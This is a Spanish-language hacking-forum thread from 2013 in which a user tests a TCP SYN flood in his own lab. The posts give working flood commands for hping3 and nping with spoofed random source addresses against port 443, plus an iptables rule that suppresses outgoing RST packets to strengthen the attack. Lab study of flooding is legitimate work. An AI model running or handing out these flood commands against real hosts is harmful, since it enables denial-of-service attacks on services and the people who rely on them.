elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  TCP SYN Flood con Nping
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: TCP SYN Flood con Nping  (Leído 4,782 veces)
pablox_co

Desconectado Desconectado

Mensajes: 26


Ver Perfil WWW
TCP SYN Flood con Nping
« en: 13 Agosto 2013, 10:27 am »

Saludos:

No he podido realizar un ataque de este tipo en mi laboratorio de pruebas, con hping3 lo he logrado:

Código:
# hping3 --syn --flood --rand-source --destport 443 192.168.1.254

Pero con nping no lo he logrado:

Código:
# nping --tcp SYN --dest-port 443 --source-ip rand --rate 90000 --count 900000 192.168.1.254

Ahí estoy tratando de recrear lo mismo que hago con hping3:
  • Flag SYN activado
  • Puerto 443 del objetivo
  • Hago un spoof de la dirección IP
  • Y la opción flood de hping la simulo con --rate y --count

Lo único diferente que he encontrado en el comportamiento entre las dos herramientas usando wireshark, es que hping3 hace un spoof de la dirección IP por cada paqueda que envía, mientras nping genera una única dirección IP para todos los paquetes enviados.

Nota: No confundir con el ataque TCP Connection Flood.

¡Gracias!
En línea

pablox_co

Desconectado Desconectado

Mensajes: 26


Ver Perfil WWW
Re: TCP SYN Flood con Nping
« Respuesta #1 en: 15 Agosto 2013, 12:17 pm »

Bueno, ahora que ya pude evitar que Nping me enviara el segmento TCP RST[1] el cual era una de las razones por los que culpaba  el NO exito de ataque (el otro era la no generación de IP aleatorias por paquetes). Probaré de nuevo el ataque en mi laboratorio añadiendo la restricción en iptables para que no salga el segmento TCP RST al objetivo:

Código:
# iptables -I OUTPUT --destination 192.168.1.254 --protocol tcp --dport 443 --tcp-flags RST RST -j DROP

Pero eso ya será el día de mañana, por ahora, es tiempo de dormir  ::).

[1] https://foro.elhacker.net/redes/nping_evitar_segmento_tcp_rst-t396059.0.html
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Nping - Evitar segmento TCP RST
Redes
pablox_co 5 3,860 Último mensaje 15 Agosto 2013, 12:07 pm
por pablox_co
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines